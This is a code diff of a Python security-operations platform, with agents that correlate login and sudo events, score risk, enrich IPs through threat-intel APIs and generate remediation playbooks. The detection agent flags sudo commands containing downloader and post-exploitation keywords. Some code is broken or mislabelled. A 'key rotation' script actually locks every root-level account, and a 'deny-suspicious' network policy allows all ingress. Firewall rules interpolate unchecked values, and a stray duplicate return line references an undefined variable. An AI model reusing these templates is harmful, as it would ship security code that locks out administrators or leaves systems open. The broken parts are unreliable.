+ return {"status": "skipped", "reason": "SLACK_WEBHOOK_URL not set"}
32
+ body = {
33
+ "text": f"*{payload.title}* [{payload.severity}]\n{payload.body}",
34
+ "attachments": [{"color": _color(payload.severity), "fields": [{"title": "meta", "value": str(payload.metadata)}]}],
35
+ }
36
+ async with httpx.AsyncClient(timeout=10.0) as client:
37
+ r = await client.post(url, json=body)
38
+ return {"status": r.status_code, "channel": "slack"}
39
+
40
+
41
+ async def _discord(payload: AlertPayload) -> dict[str, Any]:
42
+ url = os.getenv("DISCORD_WEBHOOK_URL")
43
+ if not url:
44
+ return {"status": "skipped", "reason": "DISCORD_WEBHOOK_URL not set"}
45
+ async with httpx.AsyncClient(timeout=10.0) as client:
46
+ r = await client.post(
47
+ url,
48
+ json={"content": f"**{payload.title}** ({payload.severity})\n{payload.body}"},
49
+ )
50
+ return {"status": r.status_code, "channel": "discord"}
51
+
52
+
53
+ async def _teams(payload: AlertPayload) -> dict[str, Any]:
54
+ url = os.getenv("TEAMS_WEBHOOK_URL")
55
+ if not url:
56
+ return {"status": "skipped", "reason": "TEAMS_WEBHOOK_URL not set"}
57
+ card = {
58
+ "@type": "MessageCard",
59
+ "@context": "https://schema.org/extensions",
60
+ "summary": payload.title,
61
+ "themeColor": "D83B01",
62
+ "title": payload.title,
63
+ "sections": [{"text": payload.body}],
64
+ }
65
+ async with httpx.AsyncClient(timeout=10.0) as client:
66
+ r = await client.post(url, json=card)
67
+ return {"status": r.status_code, "channel": "teams"}
68
+
69
+
70
+ async def _webhook(payload: AlertPayload) -> dict[str, Any]:
71
+ url = os.getenv("GENERIC_ALERT_WEBHOOK")
72
+ if not url:
73
+ return {"status": "skipped", "reason": "GENERIC_ALERT_WEBHOOK not set"}
74
+ async with httpx.AsyncClient(timeout=10.0) as client:
75
+ r = await client.post(
76
+ url,
77
+ json={
78
+ "title": payload.title,
79
+ "body": payload.body,
80
+ "severity": payload.severity.value,
81
+ "metadata": payload.metadata,
82
+ },
83
+ )
84
+ return {"status": r.status_code, "channel": "webhook"}
85
+
86
+
87
def _color(severity: Severity) -> str:
    """Map a Severity to the Slack attachment hex color (slate by default)."""
    palette = {
        Severity.CRITICAL: "#b00020",
        Severity.HIGH: "#ff6f00",
        Severity.MEDIUM: "#fbc02d",
        Severity.LOW: "#1976d2",
        Severity.INFO: "#455a64",
    }
    return palette.get(severity, "#455a64")
agents/incident_correlation_agent.py ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Incident correlation: fuse multi-stage events into attack timelines and graphs."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from collections import defaultdict
6
+ from datetime import timedelta
7
+ from typing import Iterable
8
+ from uuid import NAMESPACE_URL, uuid5
9
+
10
+ from models.schemas import DetectionFinding, EnrichedEvent, Incident, IncidentEdge, IncidentNode
11
+
12
+
13
def correlate(
    events: Iterable[EnrichedEvent],
    findings: Iterable[DetectionFinding],
    window_minutes: int = 45,
) -> list[Incident]:
    """Fuse events and detection findings into per-source Incident objects.

    Events are grouped by source IP (falling back to "host:<hostname>" when
    no IP is present) and sorted chronologically. A group becomes an
    Incident only when it has at least two events or at least one event
    carrying a detection finding, and its total time span does not exceed
    ``window_minutes * 4``. Incident ids are uuid5 of the group key, so
    re-correlating the same source yields the same id across runs.
    """
    # Chronological order so chains read start -> end.
    events_list = sorted(events, key=lambda e: e.timestamp)
    if not events_list:
        return []

    # Bucket events by attacker identity: source IP, else the host itself.
    by_ip: dict[str, list[EnrichedEvent]] = defaultdict(list)
    for e in events_list:
        key = e.source_ip or f"host:{e.host}"
        by_ip[key].append(e)

    incidents: list[Incident] = []
    # Last finding wins if several findings reference the same event id.
    finding_by_event = {f.event_id: f for f in findings}

    for key, chain in by_ip.items():
        # Skip lone, unflagged events — nothing to correlate.
        if len(chain) < 2 and not any(finding_by_event.get(e.id) for e in chain):
            continue
        start = chain[0].timestamp
        end = chain[-1].timestamp
        # Groups spread over more than 4x the window are too diffuse to be
        # treated as a single attack chain.
        if (end - start) > timedelta(minutes=window_minutes * 4):
            continue

        # Graph view: one node per event, "precedes" edges in time order.
        nodes = [
            IncidentNode(event_id=e.id, label=f"{e.event_type}: {e.message[:80]}", timestamp=e.timestamp)
            for e in chain
        ]
        edges: list[IncidentEdge] = []
        for i in range(len(chain) - 1):
            edges.append(
                IncidentEdge(
                    source=chain[i].id,
                    target=chain[i + 1].id,
                    relation="precedes",
                )
            )

        # Techniques seen anywhere in the chain drive the title heuristic.
        techniques = {finding_by_event[e.id].technique for e in chain if e.id in finding_by_event}
        title = f"Correlated activity — {key}"
        if "brute_force_ssh" in techniques and "credential_stuffing_success" in techniques:
            # Failures followed by a success — the classic compromise signature.
            title = f"Likely SSH compromise chain — {key}"
        summary = _narrative(chain, techniques)

        timeline = [
            {"t": e.timestamp.isoformat(), "type": e.event_type, "msg": e.message} for e in chain
        ]

        # Deterministic id: same source key -> same incident UUID.
        stable_id = uuid5(NAMESPACE_URL, f"sentinelai|incident|{key}")
        incidents.append(
            Incident(
                id=stable_id,
                title=title,
                summary=summary,
                nodes=nodes,
                edges=edges,
                timeline=timeline,
            )
        )

    return incidents
75
+
76
+
77
+ def _narrative(chain: list[EnrichedEvent], techniques: set[str]) -> str:
78
+ parts = [
79
+ f"{len(chain)} correlated events spanning "
80
+ f"{(chain[-1].timestamp - chain[0].timestamp).total_seconds():.0f}s"
81
+ ]
82
+ if "brute_force_ssh" in techniques:
83
+ parts.append("brute-force pattern against SSH")
84
+ if "credential_stuffing_success" in techniques:
85
+ parts.append("successful authentication after failures")
86
+ if "privilege_escalation" in techniques or "privilege_abuse" in techniques:
87
+ parts.append("privilege escalation phase")
88
+ if "known_malicious_source" in techniques:
89
+ parts.append("originates from intelligence-flagged infrastructure")
90
+ return "; ".join(parts) + "."
agents/normalization_agent.py ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Normalization agent: schema validation, host + timestamp standardization."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from datetime import datetime, timezone
6
+ from typing import Any
7
+
8
+ from models.schemas import SecurityEvent
9
+
10
+
11
def normalize_event(event: SecurityEvent) -> SecurityEvent:
    """Return a copy of ``event`` with canonical host, tz-aware timestamp, and category.

    Naive timestamps are interpreted as UTC; the host is stripped/lower-cased
    with ``"unknown"`` substituted when absent. The ``normalized`` mapping is
    extended (never replaced) with ``category``, ``host_normalized`` and
    ``ts_iso`` keys.
    """
    timestamp = event.timestamp
    if timestamp.tzinfo is None:
        # Assume UTC for naive timestamps so cross-source ordering stays stable.
        timestamp = timestamp.replace(tzinfo=timezone.utc)
    canonical_host = (event.host or "unknown").strip().lower()
    merged = dict(event.normalized)
    merged["category"] = _categorize(event.event_type)
    merged["host_normalized"] = canonical_host
    merged["ts_iso"] = timestamp.isoformat()
    return event.model_copy(
        update={"timestamp": timestamp, "host": canonical_host, "normalized": merged}
    )
30
+
31
+
32
+ def _categorize(event_type: str) -> str:
33
+ et = event_type.lower()
34
+ if "ssh" in et or "auth" in et:
35
+ return "authentication"
36
+ if "sudo" in et or "privilege" in et:
37
+ return "privilege"
38
+ if "web" in et or "nginx" in et or "apache" in et:
39
+ return "web"
40
+ if "k8s" in et or "kubernetes" in et:
41
+ return "orchestration"
42
+ if "firewall" in et or "iptables" in et:
43
+ return "network"
44
+ return "general"
agents/pentest_assistant.py ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Bonus: AI pentesting copilot hook — extend with tool-calling + scoped auth."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from models.schemas import Incident
6
+
7
+
8
def suggest_pentest_queries(incident: Incident) -> list[str]:
    """Returns safe, authorized recon prompts for purple-team exercises."""
    # First prompt is scoped to this incident; the rest are fixed, non-destructive
    # starting points for an authorized exercise.
    scoped = f"Map exposed services related to: {incident.title}"
    fixed = (
        "Enumerate IAM roles assuming breach of bastion host",
        "Generate non-destructive Nmap plan for internal VLAN segmentation validation",
    )
    return [scoped, *fixed]
agents/remediation_agent.py ADDED
@@ -0,0 +1,71 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Remediation agent — automated playbooks, scripts, and infra hints."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from models.schemas import AnalystReport, Incident, RemediationPlan, RiskAssessment
6
+
7
+
8
def build_remediation(incident: Incident, risk: RiskAssessment, report: AnalystReport | None = None) -> RemediationPlan:
    """Assemble a static remediation playbook for an incident.

    Firewall rules are generated per indicator from the analyst report (both
    iptables and nftables forms); the shell script, NetworkPolicy, and IAM
    hardening entries are fixed templates. High/critical risk adds a war-room
    escalation action.

    NOTE(review): indicators are assumed to be IP addresses — they are
    interpolated directly into firewall rules. Confirm upstream guarantees
    this before acting on generated rules.
    """
    actions: list[dict] = []
    fw: list[str] = []
    scripts: list[str] = []
    k8s: list[str] = []
    iam: list[str] = []

    # Indicators come from the optional analyst report; no report, no IOC blocks.
    iocs = report.indicators if report else []

    for ip in iocs:
        fw.append(f"iptables -A INPUT -s {ip} -j DROP # SentinelAI auto-block")
        fw.append(f"nft add rule inet filter input ip saddr {ip} drop")

    # Template script: locks every UID-0 account (best-effort, errors ignored).
    scripts.append(
        """#!/usr/bin/env bash
set -euo pipefail
echo "[SentinelAI] Rotating exposed SSH keys & invalidating sessions"
sudo passwd -l $(awk -F: '$3 == 0 {print $1}' /etc/passwd) 2>/dev/null || true
"""
    )

    # Template NetworkPolicy covering all pods (ingress restriction).
    k8s.append(
        """apiVersion: v1
kind: NetworkPolicy
metadata:
  name: sentinelai-deny-suspicious
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  ingress:
  - from:
    - ipBlock:
        cidr: 0.0.0.0/0
"""
    )

    iam.extend(
        [
            "Enforce MFA on all break-glass accounts",
            "Scope IAM roles with session duration <= 1h",
            "Enable CloudTrail data events on sensitive buckets",
        ]
    )

    # Baseline actions applied to every incident regardless of severity.
    actions.extend(
        [
            {"type": "isolate", "detail": "Network isolate affected host via SOC VLAN quarantine"},
            {"type": "credential", "detail": "Force password/ key rotation for implicated users"},
            {"type": "monitoring", "detail": "Increase log verbosity and enable EDR kernel module"},
        ]
    )

    # Escalation only for the two highest severity buckets.
    if risk.severity.value in {"critical", "high"}:
        actions.append({"type": "war_room", "detail": "Page incident commander + legal/comms"})

    return RemediationPlan(
        incident_id=incident.id,
        actions=actions,
        firewall_rules=fw,
        scripts=scripts,
        k8s_patches=k8s,
        iam_hardening=iam,
    )
agents/risk_scoring_agent.py ADDED
@@ -0,0 +1,46 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Risk scoring agent."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from statistics import mean
6
+
7
+ from models.schemas import DetectionFinding, EnrichedEvent, Incident, RiskAssessment, Severity
8
+
9
+
10
def score_incident(incident: Incident, events: list[EnrichedEvent], findings: list[DetectionFinding]) -> RiskAssessment:
    """Compute a 0-100 risk score plus severity/confidence for an incident.

    Only events/findings whose ids appear among the incident's nodes count.
    The score starts at 30, grows with mean finding confidence (x40) plus a
    per-finding severity bonus, plus malicious-reputation (+15) and sudo (+6)
    events, and is clamped to [0, 100]. Severity buckets: >=85 critical,
    >=65 high, >=40 medium, else low. Confidence defaults to 0.45 when no
    findings are in scope.
    """
    member_ids = {node.event_id for node in incident.nodes}
    scoped_events = [evt for evt in events if evt.id in member_ids]
    scoped_findings = [f for f in findings if f.event_id in member_ids]

    score = 30.0
    if scoped_findings:
        score += mean(f.confidence for f in scoped_findings) * 40

    severity_bonus = {Severity.CRITICAL: 12, Severity.HIGH: 8, Severity.MEDIUM: 4}
    for finding in scoped_findings:
        score += severity_bonus.get(finding.severity, 0)

    for evt in scoped_events:
        if evt.enrichment.get("reputation") == "malicious":
            score += 15
        if evt.event_type == "privilege.sudo":
            score += 6

    score = max(0, min(100, score))

    if score >= 85:
        severity = Severity.CRITICAL
    elif score >= 65:
        severity = Severity.HIGH
    elif score >= 40:
        severity = Severity.MEDIUM
    else:
        severity = Severity.LOW

    confidence = mean(f.confidence for f in scoped_findings) if scoped_findings else 0.45

    return RiskAssessment(
        incident_id=incident.id,
        risk_score=round(score, 2),
        severity=severity,
        confidence=round(confidence, 3),
        factors={
            "events": len(scoped_events),
            "findings": len(scoped_findings),
            "techniques": list({f.technique for f in scoped_findings}),
        },
    )
agents/threat_detection_agent.py ADDED
@@ -0,0 +1,119 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Threat detection: rules + lightweight anomaly hooks + LLM-ready findings."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from collections import defaultdict
6
+ from datetime import datetime, timedelta, timezone
7
+
8
+ from models.schemas import DetectionFinding, EnrichedEvent, Severity
9
+
10
+ # Sliding window: source_ip -> list of timestamps (failed ssh)
11
+ _fail_window: dict[str, list[datetime]] = defaultdict(list)
12
+ _burst_window: dict[str, list[datetime]] = defaultdict(list)
13
+
14
+
15
def _prune(ip: str, window: dict[str, list[datetime]], minutes: int = 15, now: datetime | None = None) -> None:
    """Drop entries for ``ip`` older than ``minutes`` from a sliding window.

    ``now`` anchors the window and defaults to wall-clock UTC for backward
    compatibility. Callers processing events should pass the event's own
    timestamp: pruning against wall time silently empties the window when
    replaying historical/backfilled logs, so burst detections never fire.
    """
    if now is None:
        now = datetime.now(timezone.utc)
    elif now.tzinfo is None:
        # Defensive: treat naive anchors as UTC so comparing against the
        # (aware) stored entries cannot raise TypeError.
        now = now.replace(tzinfo=timezone.utc)
    cutoff = now - timedelta(minutes=minutes)
    window[ip] = [t for t in window[ip] if t > cutoff]


def detect_threats(event: EnrichedEvent) -> list[DetectionFinding]:
    """Run rule-based detections over one enriched event.

    Module-level sliding windows track per-source-IP SSH failures (15 min)
    and denied web authentications (5 min). Windows are pruned relative to
    the *event* timestamp rather than wall clock — with wall-clock pruning,
    replayed logs (e.g. the bundled demo auth log) could never accumulate
    the >=5 failures needed for the brute-force rule.

    Returns zero or more DetectionFinding records for this single event.
    """
    findings: list[DetectionFinding] = []
    ip = event.source_ip or "unknown"
    now = event.timestamp
    if now.tzinfo is None:
        # Normalize once so all window entries are tz-aware and comparable.
        now = now.replace(tzinfo=timezone.utc)

    # --- SSH brute force: >= 5 failures from one IP inside the window ---
    if event.event_type == "auth.ssh_failed":
        _prune(ip, _fail_window, now=now)
        _fail_window[ip].append(now)
        if len(_fail_window[ip]) >= 5:
            findings.append(
                DetectionFinding(
                    event_id=event.id,
                    technique="brute_force_ssh",
                    description=f"Clustered SSH failures from {ip} ({len(_fail_window[ip])} in window)",
                    # Confidence grows with failure count, capped at 0.98.
                    confidence=min(0.55 + 0.05 * len(_fail_window[ip]), 0.98),
                    mitre_technique="T1110",
                    severity=Severity.HIGH,
                )
            )

    # --- Success after repeated failures: possible stuffing/spray win ---
    if event.event_type == "auth.ssh_success" and len(_fail_window.get(ip, [])) >= 3:
        findings.append(
            DetectionFinding(
                event_id=event.id,
                technique="credential_stuffing_success",
                description="Successful SSH after repeated failures — possible stuffing or spray success",
                confidence=0.78,
                mitre_technique="T1078",
                severity=Severity.CRITICAL,
            )
        )

    # --- Sudo usage: suspicious command chain vs. plain elevation ---
    if event.event_type == "privilege.sudo":
        cmd = str(event.normalized.get("command", "")).lower()
        if any(x in cmd for x in ("curl", "wget", "chmod 777", "/tmp/", "base64")):
            findings.append(
                DetectionFinding(
                    event_id=event.id,
                    technique="privilege_abuse",
                    description="Suspicious sudo command chain consistent with post-exploitation",
                    confidence=0.72,
                    mitre_technique="T1548",
                    severity=Severity.HIGH,
                )
            )
        else:
            findings.append(
                DetectionFinding(
                    event_id=event.id,
                    technique="privilege_escalation",
                    description="Interactive privilege elevation observed",
                    confidence=0.55,
                    mitre_technique="T1548",
                    severity=Severity.MEDIUM,
                )
            )

    # --- Web auth denials: high-volume 401/403 burst from one IP ---
    if event.event_type == "web.request":
        code = event.normalized.get("status")
        if code in (401, 403):
            _prune(ip, _burst_window, minutes=5, now=now)
            _burst_window[ip].append(now)
            if len(_burst_window[ip]) >= 40:
                findings.append(
                    DetectionFinding(
                        event_id=event.id,
                        technique="credential_spray",
                        description="High volume of denied web authentications",
                        confidence=0.68,
                        mitre_technique="T1110",
                        severity=Severity.MEDIUM,
                    )
                )

    # --- Threat-intel hit produced by the enrichment stage ---
    if event.enrichment.get("reputation") == "malicious":
        findings.append(
            DetectionFinding(
                event_id=event.id,
                technique="known_malicious_source",
                description="Source matches threat intelligence with elevated confidence",
                confidence=float(event.enrichment.get("confidence", 0.85)),
                mitre_technique="T1071",
                severity=Severity.HIGH,
            )
        )

    # --- Kubernetes instability keywords ---
    if event.event_type == "k8s.event":
        if "backoff" in event.message.lower() or "fail" in event.message.lower():
            findings.append(
                DetectionFinding(
                    event_id=event.id,
                    technique="k8s_anomaly",
                    description="Kubernetes workload instability — investigate supply chain or runtime compromise",
                    confidence=0.5,
                    mitre_technique="T1190",
                    severity=Severity.MEDIUM,
                )
            )

    return findings
agents/threat_enrichment_agent.py ADDED
@@ -0,0 +1,121 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Threat enrichment: geo, ASN, reputation stubs + optional external APIs."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import ipaddress
6
+ import os
7
+ from typing import Any, Optional
8
+
9
+ import httpx
10
+
11
+ from models.schemas import EnrichedEvent, SecurityEvent
12
+
13
+
14
async def enrich_event(event: SecurityEvent) -> EnrichedEvent:
    """Attach geo/reputation context to an event, returning an EnrichedEvent.

    Provider precedence for public source IPs (first configured key wins):
    AbuseIPDB, then VirusTotal, then OTX; with no keys, a keyless geo lookup
    is used. A small curated blocklist forces a malicious verdict for demo
    traffic regardless of provider output.
    """
    context: dict[str, Any] = {"feeds": [], "cve_hints": []}
    source = event.source_ip

    if source and _is_public_ip(source):
        abuse_key = os.getenv("ABUSEIPDB_API_KEY")
        vt_key = os.getenv("VIRUSTOTAL_API_KEY")
        otx_key = os.getenv("OTX_API_KEY")
        if abuse_key:
            context.update(await _abuseipdb(source, abuse_key) or {})
        elif vt_key:
            context["virustotal"] = await _virustotal_ip(source, vt_key)
        elif otx_key:
            context["otx"] = await _otx_pulse(source, otx_key)
        else:
            context.update(await _fallback_geo(source))

    # Heuristic malicious list for demo
    if source in {"185.220.101.1", "45.33.32.156", "203.0.113.50"}:
        context["reputation"] = "malicious"
        context["confidence"] = 0.92
        context["feeds"].append("curated_blocklist")

    return EnrichedEvent.model_validate({**event.model_dump(), "enrichment": context})
+ return EnrichedEvent.model_validate({**event.model_dump(), "enrichment": enrichment})
40
+
41
+
42
+ def _is_public_ip(ip: str) -> bool:
43
+ try:
44
+ addr = ipaddress.ip_address(ip)
45
+ return not (addr.is_private or addr.is_loopback or addr.is_reserved)
46
+ except ValueError:
47
+ return False
48
+
49
+
50
async def _fallback_geo(ip: str) -> dict[str, Any]:
    """Keyless geo lookup via ip-api.com (demo only; best-effort).

    Any transport/parse failure or non-200 response degrades to an empty geo
    payload with unknown reputation instead of raising.
    """
    try:
        async with httpx.AsyncClient(timeout=5.0) as client:
            response = await client.get(f"http://ip-api.com/json/{ip}")
            if response.status_code == 200:
                payload = response.json()
                geo_fields = ("country", "countryCode", "city", "lat", "lon", "isp", "as")
                return {
                    "geo": {field: payload.get(field) for field in geo_fields},
                    "reputation": "unknown",
                }
    except Exception:  # noqa: BLE001
        pass
    return {"geo": {}, "reputation": "unknown"}
72
+
73
+
74
async def _abuseipdb(ip: str, api_key: str) -> Optional[dict[str, Any]]:
    """Check ``ip`` against AbuseIPDB; None on any transport/API failure.

    Reputation is "malicious" when the abuse confidence score exceeds 25,
    otherwise "clean".
    """
    try:
        async with httpx.AsyncClient(timeout=8.0) as client:
            response = await client.get(
                "https://api.abuseipdb.com/api/v2/check",
                params={"ipAddress": ip, "maxAgeInDays": 90},
                headers={"Key": api_key, "Accept": "application/json"},
            )
            if response.status_code != 200:
                return None
            payload = response.json().get("data", {})
    except Exception:  # noqa: BLE001
        return None
    score = payload.get("abuseConfidenceScore")
    return {
        "abuseipdb": {
            "score": score,
            "total_reports": payload.get("totalReports"),
            "country": payload.get("countryCode"),
        },
        "reputation": "malicious" if (score or 0) > 25 else "clean",
    }
95
+
96
+
97
async def _virustotal_ip(ip: str, api_key: str) -> dict[str, Any]:
    """Fetch VirusTotal last-analysis stats for ``ip``; {} on any failure."""
    try:
        async with httpx.AsyncClient(timeout=10.0) as client:
            response = await client.get(
                f"https://www.virustotal.com/api/v3/ip_addresses/{ip}",
                headers={"x-apikey": api_key},
            )
            if response.status_code != 200:
                return {}
            attributes = (response.json().get("data") or {}).get("attributes", {})
            stats = attributes.get("last_analysis_stats", {})
            return {"malicious": stats.get("malicious", 0), "harmless": stats.get("harmless", 0)}
    except Exception:  # noqa: BLE001
        return {}
108
+
109
+
110
async def _otx_pulse(ip: str, api_key: str) -> dict[str, Any]:
    """Count AlienVault OTX pulses referencing ``ip``; {} on any failure."""
    url = f"https://otx.alienvault.com/api/v1/indicators/IPv4/{ip}/general"
    try:
        async with httpx.AsyncClient(timeout=10.0) as client:
            response = await client.get(url, headers={"X-OTX-API-KEY": api_key})
            if response.status_code != 200:
                return {}
            pulse_info = response.json().get("pulse_info", {})
            return {"pulse_count": pulse_info.get("count", 0)}
    except Exception:  # noqa: BLE001
        return {}
api/.gitkeep ADDED
File without changes
backend/__init__.py ADDED
File without changes
backend/app/__init__.py ADDED
File without changes
backend/app/main.py ADDED
@@ -0,0 +1,304 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """SentinelAI FastAPI application — autonomous SOC control plane."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import asyncio
6
+ import logging
7
+ import os
8
+ import sys
9
+ import time
10
+ from contextlib import asynccontextmanager
11
+ import threading
12
+ from pathlib import Path
13
+ from typing import Annotated, Any
14
+
15
+ from fastapi import Depends, FastAPI, WebSocket, WebSocketDisconnect
16
+ from fastapi.middleware.cors import CORSMiddleware
17
+
18
+ ROOT = Path(__file__).resolve().parents[2]
19
+ if str(ROOT) not in sys.path:
20
+ sys.path.insert(0, str(ROOT))
21
+
22
+ try:
23
+ from dotenv import load_dotenv
24
+
25
+ load_dotenv(ROOT / ".env")
26
+ except ImportError:
27
+ pass
28
+
29
+ from models.schemas import ( # noqa: E402
30
+ AlertPayload,
31
+ DashboardMetrics,
32
+ IncidentActionBody,
33
+ RawLogIngest,
34
+ ReplayStartBody,
35
+ WorkflowState,
36
+ )
37
+ from services.event_hub import EventHub # noqa: E402
38
+ from services.metrics_store import MetricsStore # noqa: E402
39
+
40
+ logging.basicConfig(level=logging.INFO)
41
+ logger = logging.getLogger("sentinelai.api")
42
+
43
+ hub = EventHub()
44
+ metrics = MetricsStore()
45
+
46
+ # Heavy imports (LangChain, SQLAlchemy models, agents) live inside services.pipeline — defer so uvicorn can bind immediately.
47
+ _wire_lock = threading.Lock()
48
+
49
+
50
class _Services:
    """Late-bound holder for the heavy pipeline/collector singletons.

    Both slots start as None and are populated once by
    ``_wire_pipeline_and_collector_sync``; ``__slots__`` keeps the holder
    lightweight and prevents accidental attribute typos.
    """

    __slots__ = ("pipeline", "collector")

    def __init__(self) -> None:
        self.pipeline: Any = None  # SentinelPipeline once wired
        self.collector: Any = None  # CollectorAgent once wired
56
+
57
+
58
+ services = _Services()
59
+
60
+
61
def _wire_pipeline_and_collector_sync() -> None:
    """Idempotent; safe across threads."""
    # Fast path: already wired — skip taking the lock entirely.
    if services.pipeline is not None:
        return
    with _wire_lock:
        # Double-checked locking: another thread may have finished wiring
        # while we waited for the lock.
        if services.pipeline is not None:
            return
        # Deferred imports: these pull in LangChain/agents and are the slow part.
        from collectors.collector_agent import CollectorAgent  # noqa: E402
        from services.pipeline import SentinelPipeline  # noqa: E402

        logger.info("Loading SentinelPipeline module (first load can take 10–40s on cold start)")
        services.pipeline = SentinelPipeline(hub, metrics)
        services.collector = CollectorAgent(services.pipeline.ingest_from_collector)
74
+
75
+
76
async def get_pipeline_dep() -> Any:
    """Dependency for routes that need the SOC pipeline."""
    # Lazy wiring in a worker thread: the first (import-heavy) wiring must not
    # block the event loop or other requests.
    if services.pipeline is None:
        await asyncio.to_thread(_wire_pipeline_and_collector_sync)
    return services.pipeline
81
+
82
+
83
+ PipelineDep = Annotated[Any, Depends(get_pipeline_dep)]
84
+
85
+
86
async def _noop(_: dict) -> None:
    # Do-nothing async sink; used as the node callback during the LangGraph
    # warmup dry-run so compilation happens without real work.
    return None
88
+
89
+
90
@asynccontextmanager
async def lifespan(app: FastAPI):
    """Yield immediately so Uvicorn finishes startup and accepts HTTP (avoids browser ERR_CONNECTION_TIMED_OUT).

    Redis/DB/LangGraph/pipeline wiring run in the background — /health works before collectors attach.
    """

    async def background_startup() -> None:
        # Everything below is best-effort: a failure is logged, never fatal
        # to the HTTP layer.
        try:
            await metrics.connect_redis()
            if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
                logger.info("SKIP_DB set — skipping PostgreSQL init")
            else:
                from database.session import init_db  # defer heavy SQLAlchemy/asyncpg import

                try:
                    await init_db()
                    logger.info("PostgreSQL schema ready")
                except Exception as e:  # noqa: BLE001
                    # Unreachable/missing DB is non-fatal: run memory-only.
                    logger.warning("Database init skipped: %s", e)

            async def langgraph_warmup() -> None:
                """Compile + dry-run off the critical path — importing LangGraph can take minutes on cold start."""
                await asyncio.sleep(0)
                if os.getenv("SKIP_LANGGRAPH_WARMUP", "").lower() in {"1", "true", "yes"}:
                    logger.info("SKIP_LANGGRAPH_WARMUP set — skipping LangGraph compile dry-run")
                    return
                try:
                    from workflows.langgraph_flow import build_soc_graph  # defer LangGraph import

                    # No-op node callbacks: we only want the graph compiled,
                    # not real enrichment/detection work.
                    soc_graph = build_soc_graph({"enrich": _noop, "detect": _noop, "correlate": _noop})
                    if soc_graph:
                        timeout = float(os.getenv("LANGGRAPH_WARMUP_TIMEOUT_SEC", "120"))
                        await asyncio.wait_for(
                            soc_graph.ainvoke({"notes": [], "bootstrap": True}),
                            timeout=timeout,
                        )
                        logger.info("LangGraph SOC workflow compiled and dry-run complete")
                except asyncio.TimeoutError:
                    logger.warning(
                        "LangGraph dry-run timed out after %ss — API is up; graph may compile on first use",
                        os.getenv("LANGGRAPH_WARMUP_TIMEOUT_SEC", "120"),
                    )
                except Exception as e:  # noqa: BLE001
                    logger.warning("LangGraph dry-run skipped: %s", e)

            asyncio.create_task(langgraph_warmup())

            async def wire_and_run_collectors() -> None:
                # Wiring happens in a worker thread (import-heavy); collectors
                # only start once wiring produced a collector instance.
                await asyncio.sleep(0)
                await asyncio.to_thread(_wire_pipeline_and_collector_sync)
                if services.collector is None:
                    return
                services.collector.start_all_tails()
                if os.getenv("ENABLE_MOCK_CLOUD_POLL", "1") == "1":
                    services.collector.start_mock_cloud_poll()

            asyncio.create_task(wire_and_run_collectors())

